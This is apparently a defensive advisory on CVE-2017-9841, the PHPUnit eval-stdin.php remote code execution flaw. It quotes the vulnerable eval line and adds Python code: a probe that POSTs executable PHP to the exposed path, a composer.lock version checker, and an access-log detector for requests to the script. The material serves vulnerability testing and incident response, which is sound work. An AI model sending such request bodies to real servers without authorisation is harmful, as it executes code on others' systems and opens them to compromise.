CVE-2017-9841: Remote Code Execution via vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Overview

The core issue behind CVE-2017-9841 is not a complex cryptographic failure or a subtle logical flaw. It is a textbook case of code injection: a helper script inside a test framework evaluates, with PHP's eval(), whatever arrives in the body of an HTTP request. The script, eval-stdin.php, ships inside the PHPUnit package at vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php in any Composer-managed project that installs PHPUnit. It was designed as a helper for PHPUnit's internal test runner, which uses it to receive PHP code on standard input and execute it. It was never meant to be reachable over HTTP, but when a project deploys its vendor/ directory under the web root, it is. The issue is tracked at NVD as "CVE-2017-9841 Detail".

Affected Versions

PHPUnit 4.x: versions before 4.8.28
PHPUnit 5.x: versions before 5.6.3

Any application that ships one of these versions inside a web-accessible vendor/ directory is exposed, whether or not the application itself ever runs PHPUnit. Intrusion-detection signatures for the attack are commonly named along the lines of PHPUnit.Eval-stdin.PHP.Remote.Code.Execution.

Impact

Successful exploitation lets an attacker execute arbitrary PHP on the server with the privileges of the web server process. In practice that means full system compromise: reading sensitive credentials (such as .env files), accessing databases, installing web shells or other malware, and pivoting further into the environment. The Androxgh0st malware family, widely observed in 2024 and 2025, includes this exploit in its mass-scanning routines precisely because vulnerable copies of eval-stdin.php are still common on production hosts.

Remediation

Short term (hours–days)

Prevent direct access to any script inside vendor/. The directory should never be served by the web server; deny requests to it at the web server or framework routing layer so that eval-stdin.php, and every other vendor script, returns 403 or 404 instead of executing.

Long term (weeks–months)

Upgrade PHPUnit to 4.8.28, 5.6.3 or a later release and keep it current. Review the deployment so that the web root contains only files intended to be served; vendor/ belongs outside it. Treat any remaining code path that evaluates external input as a defect: input that fails validation should be rejected or logged, never handed to eval().

How the Exploit Works

In vulnerable versions the script was dangerously simple: it evaluated user-supplied input directly with PHP's eval(). If the vendor/ folder is publicly accessible from the web, anyone who can reach the server can send a crafted POST request to the predictable path of the file and execute arbitrary code. No authentication and no knowledge of the application are required. The entire vulnerability is a single line of execution inside eval-stdin.php:

eval('?>' . file_get_contents('php://input'));
This line reads the raw body of the HTTP request through the php://input stream and passes it straight to eval(). The leading '?>' switches the parser out of PHP mode, so the body is parsed exactly like a .php file: anything after a <?php tag in the POST body is compiled and executed on the web server, with the privileges of the PHP process, and anything it prints comes back in the HTTP response.
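The following Python probe is an added example, not code from the original page or from the PHPUnit project. It shows the mechanics described above in a safe form: the POST body opens a <?php tag and asks the server to echo the md5 of a marker string, so the marker's appearance in the response proves the body was evaluated. The path constant matches the vendor/ location named in the text; the marker string, the User-Agent value and the classification labels are assumptions chosen for this example.

```python
"""Safe probe for CVE-2017-9841: does eval-stdin.php evaluate the POST body?"""
import hashlib
import urllib.error
import urllib.request

# Location of the helper script inside a Composer vendor/ tree (from the advisory).
EVAL_STDIN_PATH = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"

# Constructed marker: the probe asks the server to print md5(MARKER). Seeing that
# digest in the response proves the body was executed as PHP, without doing harm.
MARKER = "cve-2017-9841-probe"
EXPECTED = hashlib.md5(MARKER.encode()).hexdigest()


def build_probe_body() -> bytes:
    # The vulnerable line is eval('?>' . file_get_contents('php://input')).
    # The leading '?>' puts the parser in HTML mode, so the body must open a
    # <?php tag before anything executes.
    return f"<?php echo md5('{MARKER}');".encode()


def build_request(base_url: str) -> urllib.request.Request:
    url = base_url.rstrip("/") + EVAL_STDIN_PATH
    return urllib.request.Request(
        url,
        data=build_probe_body(),
        method="POST",
        headers={"Content-Type": "text/plain", "User-Agent": "cve-2017-9841-check"},
    )


def classify(status: int, body: bytes) -> str:
    """Interpret the response to the probe.

    vulnerable : the digest came back, so the POST body was evaluated.
    blocked    : 403/404, the script is not reachable (what a vendor/ deny rule produces).
    present    : 200 without the digest, file reachable but not evaluating the body
                 (patched releases read php://stdin, which is empty over HTTP).
    unknown    : anything else, including network errors.
    """
    if EXPECTED.encode() in body:
        return "vulnerable"
    if status in (403, 404):
        return "blocked"
    if status == 200:
        return "present"
    return "unknown"


def probe(base_url: str, timeout: float = 5.0) -> str:
    req = build_request(base_url)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as e:
        return classify(e.code, e.read())
    except (urllib.error.URLError, OSError):
        return "unknown"


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1] if len(sys.argv) > 1 else "http://localhost"))
```

Run it only against hosts you are authorised to test. A "present" result still deserves attention: the file is reachable, which means vendor/ is being served, even if this particular script no longer evaluates request bodies.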
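The version ranges listed under Affected Versions can be turned into an inventory check. The following Python is an added example, not code from the original page or from the PHPUnit project; it reads a composer.lock, which Composer writes in JSON with "packages" and "packages-dev" arrays, and reports any phpunit/phpunit entry that falls before the fixed releases 4.8.28 and 5.6.3 named above. The sample lock file embedded in the block is constructed for the example.

```python
"""Check a composer.lock for a PHPUnit version affected by CVE-2017-9841."""
import json
import re

# Fixed releases named in the advisory: 4.8.28 for the 4.x line, 5.6.3 for 5.x.
FIXED = {4: (4, 8, 28), 5: (5, 6, 3)}


def parse_version(v: str):
    """Turn '4.8.27', 'v5.6.2' or '5.6.2-beta1' into a comparable tuple, or None.

    Pre-release suffixes are ignored, so a '5.6.3-RC1' is treated as 5.6.3.
    """
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", v)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version: str) -> bool:
    """True when the version falls inside a range the advisory lists as affected.

    Versions outside 4.x and 5.x are reported as not affected by this check;
    they are outside the listed ranges, not proven safe.
    """
    parsed = parse_version(version)
    if parsed is None:
        return False
    fixed = FIXED.get(parsed[0])
    return fixed is not None and parsed < fixed


def affected_packages(lock_text: str) -> list:
    """Return (section, version) pairs for affected phpunit/phpunit entries."""
    lock = json.loads(lock_text)
    hits = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == "phpunit/phpunit" and is_affected(pkg.get("version", "")):
                hits.append((section, pkg["version"]))
    return hits


# Constructed sample lock file for this example, not from any real project.
SAMPLE_LOCK = json.dumps({
    "packages": [{"name": "monolog/monolog", "version": "1.23.0"}],
    "packages-dev": [{"name": "phpunit/phpunit", "version": "5.6.2"}],
})

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOCK
    for section, version in affected_packages(text):
        print(f"affected: phpunit/phpunit {version} ({section})")
```

A hit in "packages-dev" carries its own lesson: PHPUnit is a development dependency, and a production vendor/ tree built without dev packages would not contain eval-stdin.php at all.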
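Because the file lives at a predictable path and the Androxgh0st campaigns mentioned under Impact scan for it at scale, web server access logs are the quickest place to tell a scan from a successful execution. The following Python is an added example, not code from the original page or from the PHPUnit project; it parses Apache/nginx "combined"-style log lines, decodes percent-encoded paths, flags requests for eval-stdin.php and grades them by method and status. The log lines embedded in the block are constructed for the example, using documentation-range IP addresses; the severity labels are this example's own.

```python
"""Flag access-log entries that target PHPUnit's eval-stdin.php."""
import re
from urllib.parse import unquote

# host ident user [time] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Scanners try many prefixes (vendor/, lib/, laravel/vendor/ ...), so match on the
# file name rather than the full vendor path.
TARGET = re.compile(r"eval-stdin\.php$", re.IGNORECASE)


def normalize_path(raw: str) -> str:
    """Drop the query string and decode percent-encoding twice for double-encoded probes."""
    path = raw.split("?", 1)[0]
    return unquote(unquote(path))


def classify_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, raw_path, status, _size = m.groups()
    path = normalize_path(raw_path)
    if not TARGET.search(path):
        return None
    # A 200 to a POST means the script ran the request body: a confirmed
    # execution, not just a scan. A 200 to a GET shows the file is reachable.
    # 403/404 responses are probes that a vendor/ deny rule has stopped.
    if method == "POST" and status == "200":
        severity = "confirmed-execution"
    elif status == "200":
        severity = "reachable"
    else:
        severity = "probe"
    return {"ip": ip, "time": ts, "method": method, "path": path,
            "status": int(status), "severity": severity}


def scan(lines):
    return [r for r in (classify_line(l) for l in lines) if r]


# Constructed sample log lines for this example (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2025:10:15:01 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 32 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2025:10:15:02 +0000] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [12/Mar/2025:11:02:40 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 169 "-" "curl/8.5.0"',
    '198.51.100.2 - - [12/Mar/2025:11:02:41 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval%2Dstdin.php?x=1 HTTP/1.1" 200 32 "-" "curl/8.5.0"',
    '192.0.2.9 - - [12/Mar/2025:11:05:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in scan(lines):
        print(f"{hit['severity']:20} {hit['ip']:16} {hit['method']} {hit['status']} {hit['path']}")
```

Any "confirmed-execution" entry should be handled as an incident: assume the .env file, database credentials and anything else readable by the web server user have been taken, and look for web shells written around the same timestamp.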